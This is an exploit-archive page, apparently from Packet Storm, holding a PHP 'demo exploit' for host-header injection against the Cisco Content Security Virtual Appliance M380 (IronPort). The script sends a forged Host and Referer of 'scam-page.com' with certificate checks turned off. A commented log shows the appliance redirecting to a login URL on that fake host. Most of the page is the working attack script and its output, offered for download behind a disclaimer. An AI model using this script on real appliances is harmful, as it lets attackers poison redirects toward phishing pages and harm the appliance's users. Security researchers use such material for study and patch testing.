what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification
Posted Sep 9, 2019
Authored by Todor Donev

Cisco Content Security Virtual Appliance M380 IronPort remote cross site host modification demo exploit.

tags | exploit, remote
systems | cisco
SHA-256 | 73c9d99009b7401255bba6a1f56507939d40908be4130273b2c562c5a4a3adb6

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification

Change Mirror Download
<?php
//
// Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
// Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
// Disclaimer:
// This or previous programs are for Educational purpose ONLY. Do not use it without permission.
// The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
// caused by direct or indirect use of the information or functionality provided by these programs.
// The author or any Internet provider bears NO responsibility for content or misuse of these programs
// or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
// system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
// responsibility.
//
// Use them at your own risk!
//
//
// [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
// PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019
// Listening on http://localhost:1337
// Document root is /home/test/ironport
// Press Ctrl-C to quit.
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * Initializing NSS with certpath: sql:/etc/pki/nssdb
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:47:59 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:47:59 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
// < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:48:00 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:48:00 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
// < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
//


$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control: public',
'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
'Host: '.$fake_host,
'Referer: '.$fake_host,
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close